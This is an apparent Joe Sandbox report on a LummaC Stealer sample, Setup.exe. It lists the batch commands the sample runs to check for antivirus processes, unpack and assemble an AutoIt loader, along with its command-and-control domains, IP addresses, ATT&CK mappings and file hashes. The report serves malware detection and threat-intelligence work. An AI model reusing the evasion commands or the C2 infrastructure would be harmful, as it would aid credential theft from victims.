      Source: Hc.com, 0000000C.00000002.2353776475.0000000003FF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: manyrestro.lat
      Source: Hc.com, 0000000C.00000002.2353776475.0000000003FF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: slipperyloo.lat
      Source: Hc.com, 0000000C.00000002.2353776475.0000000003FF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: wordyfindy.lat
      Source: Hc.com, 0000000C.00000002.2353776475.0000000003FF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: hungrypaster.click
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00681B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,12_2_00681B4D
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0062338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_0062338B
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0068BBED SendInput,keybd_event,12_2_0068BBED
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0068EC6C mouse_event,12_2_0068EC6C
      Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Clicks Clicks.cmd & Clicks.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 280366Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E AgreesJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Travels" Served Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Statement + ..\Avon + ..\Gnome + ..\Digital + ..\Clearing + ..\Flat + ..\Systems IJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\280366\Hc.com Hc.com IJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_006814AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,12_2_006814AE
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00681FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,12_2_00681FB0
      Source: Hc.com, 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, Hc.com, 0000000C.00000003.2310520132.0000000004405000.00000004.00000800.00020000.00000000.sdmp, Developers.9.dr, Hc.com.2.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: Hc.comBinary or memory string: Shell_TrayWnd
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00640A08 cpuid 12_2_00640A08
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0067E5F4 GetLocalTime,12_2_0067E5F4
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0067E652 GetUserNameW,12_2_0067E652
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0065BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_0065BCD2
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
      Source: Hc.comBinary or memory string: WIN_81
      Source: Hc.comBinary or memory string: WIN_XP
      Source: Hc.com.2.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
      Source: Hc.comBinary or memory string: WIN_XPe
      Source: Hc.comBinary or memory string: WIN_VISTA
      Source: Hc.comBinary or memory string: WIN_7
      Source: Hc.comBinary or memory string: WIN_8

      Remote Access Functionality

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_006A2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,12_2_006A2263
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_006A1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,12_2_006A1C61

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire Infrastructure2
      Valid Accounts      		1
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      Exploitation for Privilege Escalation      		1
      Disable or Modify Tools      		21
      Input Capture      		2
      System Time Discovery      		Remote Services1
      Archive Collected Data      		1
      Ingress Tool Transfer      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API      		2
      Valid Accounts      		1
      DLL Side-Loading      		11
      Deobfuscate/Decode Files or Information      		LSASS Memory1
      Account Discovery      		Remote Desktop Protocol21
      Input Capture      		11
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      PowerShell      		Logon Script (Windows)2
      Valid Accounts      		2
      Obfuscated Files or Information      		Security Account Manager3
      File and Directory Discovery      		SMB/Windows Admin Shares3
      Clipboard Data      		2
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
      Access Token Manipulation      		1
      DLL Side-Loading      		NTDS17
      System Information Discovery      		Distributed Component Object ModelInput Capture113
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
      Process Injection      		11
      Masquerading      		LSA Secrets21
      Security Software Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
      Valid Accounts      		Cached Domain Credentials1
      Virtualization/Sandbox Evasion      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      Virtualization/Sandbox Evasion      		DCSync4
      Process Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
      Access Token Manipulation      		Proc Filesystem1
      Application Window Discovery      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
      Process Injection      		/etc/passwd and /etc/shadow1
      System Owner/User Discovery      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580131 Sample: Setup.exe Startdate: 24/12/2024 Architecture: WINDOWS Score: 88 29 hungrypaster.click 2->29 31 PvXlInYKrSNwyXWSA.PvXlInYKrSNwyXWSA 2->31 35 Suricata IDS alerts for network traffic 2->35 37 Found malware configuration 2->37 39 Yara detected LummaC Stealer 2->39 41 3 other signatures 2->41 8 Setup.exe 21 2->8         started        signatures3 process4 process5 10 cmd.exe 2 8->10         started        file6 27 C:\Users\user\AppData\Local\Temp\...\Hc.com, PE32 10->27 dropped 43 Drops PE files with a suspicious file extension 10->43 14 Hc.com 10->14         started        18 extrac32.exe 20 10->18         started        21 cmd.exe 2 10->21         started        23 8 other processes 10->23 signatures7 process8 dnsIp9 33 hungrypaster.click 188.114.96.6, 443, 49731, 49737 CLOUDFLARENETUS European Union 14->33 45 LummaC encrypted strings found 14->45 25 C:\Users\user\AppData\Local\Temp\Adaptor, DOS 18->25 dropped file10 signatures11

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Setup.exe0%ReversingLabs
      Setup.exe6%VirustotalBrowse

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\280366\Hc.com0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\Adaptor0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://hungrypaster.click:443/api0r101r102r115r118r101r120r115r118r125r51r73r118r116r51r84r105r114r0%Avira URL Cloudsafe
      https://hungrypaster.click/apiX0%Avira URL Cloudsafe
      https://hungrypaster.click/0%Avira URL Cloudsafe
      https://hungrypaster.click:443/api0%Avira URL Cloudsafe
      https://hungrypaster.click/zj0%Avira URL Cloudsafe
      hungrypaster.click0%Avira URL Cloudsafe
      https://hungrypaster.click/api0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      hungrypaster.click
      		188.114.96.6
      		truetrue
        		unknown
        PvXlInYKrSNwyXWSA.PvXlInYKrSNwyXWSA
        		unknown
        		unknownfalse
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          wordyfindy.latfalse
            		high
            slipperyloo.latfalse
              		high
              curverpluch.latfalse
                		high
                tentabatte.latfalse
                  		high
                  hungrypaster.clicktrue
                  • Avira URL Cloud: safe
                  		unknown
                  manyrestro.latfalse
                    		high
                    bashfulacid.latfalse
                      		high
                      shapestickyr.latfalse
                        		high
                        https://hungrypaster.click/apitrue
                        • Avira URL Cloud: safe
                        		unknown
                        talkynicer.latfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0Setup.exefalse
                            		high
                            https://hungrypaster.click/zjHc.com, 0000000C.00000002.2353015147.0000000003EF0000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://hungrypaster.click/Hc.com, 0000000C.00000002.2353015147.0000000003EF0000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000C.00000002.2352426923.00000000018D7000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://hungrypaster.click:443/apiHc.com, 0000000C.00000002.2352128877.00000000016D7000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.ssl.com/repository0Setup.exefalse
                              		high
                              http://ocsps.ssl.com0Setup.exefalse
                                		high
                                http://www.autoitscript.com/autoit3/XHc.com, 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp, Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Developers.9.dr, Hc.com.2.drfalse
                                  		high
                                  http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0Setup.exefalse
                                    		high
                                    http://nsis.sf.net/NSIS_ErrorErrorSetup.exefalse
                                      		high
                                      http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_Setup.exefalse
                                        		high
                                        https://www.autoitscript.com/autoit3/Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Hc.com.2.dr, Fw.9.drfalse
                                          		high
                                          http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0Setup.exefalse
                                            		high
                                            https://hungrypaster.click:443/api0r101r102r115r118r101r120r115r118r125r51r73r118r116r51r84r105r114rHc.com, 0000000C.00000002.2352128877.00000000016D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://hungrypaster.click/apiXHc.com, 0000000C.00000002.2352426923.0000000001901000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            188.114.96.6
                                            		hungrypaster.clickEuropean Union
                                            		13335CLOUDFLARENETUStrue

                                            General Information

                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1580131
                                            Start date and time:2024-12-24 01:25:16 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 6m 18s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:16
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:Setup.exe
                                            Detection:MAL
                                            Classification:mal88.troj.evad.winEXE@24/24@2/1
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 98%
                                            • Number of executed functions: 77
                                            • Number of non-executed functions: 302
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe

                                            Warnings

                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                            • Excluded IPs from analysis (whitelisted): 13.107.246.43, 4.245.163.56
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtSetInformationFile calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            19:26:12API Interceptor1x Sleep call for process: Setup.exe modified
                                            19:26:16API Interceptor2x Sleep call for process: Hc.com modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            188.114.96.6236236236.elfGet hashmaliciousUnknownBrowse
                                            • hollweghospitality.com/blog/wp-login.php
                                            BanK_copy.rtfGet hashmaliciousUnknownBrowse
                                            • 244-3-drvu.4everland.app/bankcopy.exe
                                            Purchase Order..exeGet hashmaliciousFormBookBrowse
                                            • www.bser101pp.buzz/v89f/
                                            ibk0BQaWAo.exeGet hashmaliciousUnknownBrowse
                                            • orbitdownloader.com/
                                            ibk0BQaWAo.exeGet hashmaliciousUnknownBrowse
                                            • orbitdownloader.com/
                                            e6o7hKFmfC.exeGet hashmaliciousFormBookBrowse
                                            • www.astrofrance.online/uem3/?BpE=hw9wdlgRPJgu6mhEw3v3abu2JdZhLnzfTKsoEzFZGCpKAu6wx+OREaAyoHMqAY/6AEPW&SH=IDKTKDM

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            hungrypaster.clickAutoUpdate.exeGet hashmaliciousLummaCBrowse
                                            • 104.21.93.82

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            CLOUDFLARENETUSSetup.exeGet hashmaliciousLummaCBrowse
                                            • 188.114.96.6
                                            'Set-up.exeGet hashmaliciousLummaCBrowse
                                            • 172.67.169.205
                                            setup.exeGet hashmaliciousLummaCBrowse
                                            • 172.67.191.144
                                            Setup.exeGet hashmaliciousLummaCBrowse
                                            • 104.21.27.229
                                            installer.msiGet hashmaliciousUnknownBrowse
                                            • 104.21.80.93
                                            Setup.exeGet hashmaliciousLummaCBrowse
                                            • 104.21.58.45
                                            AutoUpdate.exeGet hashmaliciousLummaCBrowse
                                            • 172.67.169.205
                                            EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                            • 172.67.177.134
                                            https://en.newsnowbangla.com/archives/69912Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                            • 104.17.25.14
                                            https://u48917305.ct.sendgrid.net/ls/click?upn=u001.ztQPJiWtq2gO8V-2Ftd7SxY9UCAq3VScTPSloeIw5UEMPd6e3nbPRvJ98moPTqmrdQ1eNbvwZHJ-2BEb4HrooVFNCTltmXW6SgRONKSmPzdFoWfDQT97cczFZ0vj7M2xBd2izDTi-2BL-2BoVqB8yVzV2GW7vOPvy3s9yVghrOS5vs-2BSnWyzJMkXQxVEReq4oLCDet7QAOvo_JkpSD-2Bg6VoLAQppUKMb-2BxDh4v4nbOeQFT31aoN-2FLkhvFCzY6wdlGM7RTNIi47OKR1tTaghG8tTKssArDNPSXAfX9wO6nsZ2FHn-2FunyaOti-2FaII-2FnbKYDXJOImW-2Bs9f4tYnWj8rqO7L0kp4KNRHBDo0iHoL8DEOGc8GMtzqzsIqERel6-2FxJyY4DBnsnUTOc2I4HCPKA6lxcCEXMtxEA1-2FnQ-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                            • 104.17.25.14

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            a0e9f5d64349fb13191bc781f81f42e1Setup.exeGet hashmaliciousLummaCBrowse
                                            • 188.114.96.6
                                            'Set-up.exeGet hashmaliciousLummaCBrowse
                                            • 188.114.96.6
                                            setup.exeGet hashmaliciousLummaCBrowse
                                            • 188.114.96.6
                                            Setup.exeGet hashmaliciousLummaCBrowse
                                            • 188.114.96.6
                                            Setup.exeGet hashmaliciousLummaCBrowse
                                            • 188.114.96.6
                                            AutoUpdate.exeGet hashmaliciousLummaCBrowse
                                            • 188.114.96.6
                                            Violated Heroine_91zbZ-1.exeGet hashmaliciousUnknownBrowse
                                            • 188.114.96.6
                                            xlSzrIs5h6.exeGet hashmaliciousLummaC, StealcBrowse
                                            • 188.114.96.6
                                            ZysXVT72cl.exeGet hashmaliciousLummaCBrowse
                                            • 188.114.96.6
                                            NxqDwaYpbp.exeGet hashmaliciousLummaCBrowse
                                            • 188.114.96.6

                                            Dropped Files

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Users\user\AppData\Local\Temp\280366\Hc.comfkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                              ChoForgot.exeGet hashmaliciousVidarBrowse
                                                94e.exeGet hashmaliciousRemcosBrowse
                                                  94e.exeGet hashmaliciousRemcosBrowse
                                                    0442.pdf.exeGet hashmaliciousRemcosBrowse
                                                      acronis recovery expert deluxe 1.0.0.132.rarl.exeGet hashmaliciousLummaCBrowse
                                                        trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                          9EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                                            Wine.exeGet hashmaliciousLummaCBrowse
                                                              Setup.exeGet hashmaliciousLummaCBrowse

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Temp\280366\Hc.com

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:modified
                                                                Size (bytes):947288
                                                                Entropy (8bit):6.630612696399572
                                                                Encrypted:false
                                                                SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                MD5:62D09F076E6E0240548C2F837536A46A
                                                                SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: fkawMJ7FH8.exe, Detection: malicious, Browse
                                                                • Filename: ChoForgot.exe, Detection: malicious, Browse
                                                                • Filename: 94e.exe, Detection: malicious, Browse
                                                                • Filename: 94e.exe, Detection: malicious, Browse
                                                                • Filename: 0442.pdf.exe, Detection: malicious, Browse
                                                                • Filename: acronis recovery expert deluxe 1.0.0.132.rarl.exe, Detection: malicious, Browse
                                                                • Filename: trZG6pItZj.exe, Detection: malicious, Browse
                                                                • Filename: 9EI7wrGs4K.exe, Detection: malicious, Browse
                                                                • Filename: Wine.exe, Detection: malicious, Browse
                                                                • Filename: Setup.exe, Detection: malicious, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\280366\I

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):466124
                                                                Entropy (8bit):7.999604773482189
                                                                Encrypted:true
                                                                SSDEEP:12288:yEBA5qYZFNNFg5y6qh8DLJv836EzIqP6Ft+t2k1epDSp:xA5qcNDg5yh8PtW6FVFt+pgC
                                                                MD5:3224476071285CA2C85876002120182B
                                                                SHA1:F6EC731B44C016BC642EAA5B8AFF12D798417500
                                                                SHA-256:523A25C70126A9947C491587282827B07352DAFBDE21197727E7B22787F51E8E
                                                                SHA-512:DE960E7097CBC92D9C175B646206D96C722F9104B30FB333128F48EDCFA4B2D474C1F1632F15031EAEEFFF61FF5480B40F4C0E53804835FA8D7538BDFA09AD16
                                                                Malicious:false
                                                                Preview:nj.*~m^$..~hF.8v..S.._..(%....=....I......vS.x.G .........Xd....l...e.NJ4.81...{u.9.5..k......:.E2.bY.Y.&.yQB.E..|.[s>...(.e.`...q{I...3.J..R?.... ..0....0........'....t.(..7o...ye<At....-.<...n.......d..1FU.c...L..af..G..../.{."...H/:....h..'.|.#B....v....z......T.....o....E)...#Y`s..y..].].*..._.....e....ab0.+..;`c5).......rS...7U9.O.......l....O..UW.].)Rk ..2....Q..QD.3A.zx.I..y.....%......aM..M.cd.6$R.6......c..t2..(MDLT-i........nR.w...cI..c....'...=.o........".O.......C.h"..E.x.`...s4C.5)..s..M......%=iW...^.f.F..X>f.Z.U.8.yk.(bt.NW.....&...g..3..&>.LgL...M.Y5a....O.4.;.....+...I;6d..E.4.<....T...V.....r...9..&..................j..3tU..A..5.......l........i-M..:..W.u.MF.Kd.1a..../Z{+.....&.\.nj.{..6y..<.2....s/Y.Y.#.;...W...Ty.D%s:..x.>....u........G.x.^....1.H......Y..R..!}l..?c=J0,pD0.....=,..e+50.......G.....X..N.G!i.......526.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.

                                                                C:\Users\user\AppData\Local\Temp\Adaptor

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\extrac32.exe
                                                                File Type:DOS executable (COM)
                                                                Category:dropped
                                                                Size (bytes):52224
                                                                Entropy (8bit):6.616637261148489
                                                                Encrypted:false
                                                                SSDEEP:768:WY6rbybcdAqM4w85qviR93X0Z1IrvD19c1pQLiype/ehju5rWiq/DOSOlwRDNFo1:WY464qvI932eOypvcLSDOSpZ+Sh+IU
                                                                MD5:73240421468DABA3E1CACD56A08D2CF9
                                                                SHA1:D22B0E5DA0EE5CE4F19B41228016DB890A3F0CD4
                                                                SHA-256:5AE5202682B0F5F6C87E9E28858E1E9BE2F7032582BF28BD720517BA0D7E4FBB
                                                                SHA-512:140100D41B41DDD1574114A264BF4858BC408E0C79D24AA1001BCB9F86B392A35B1773215B9E6CC6665F37D16F866E8A996C470A2611EB7D5C969BC301C3242C
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
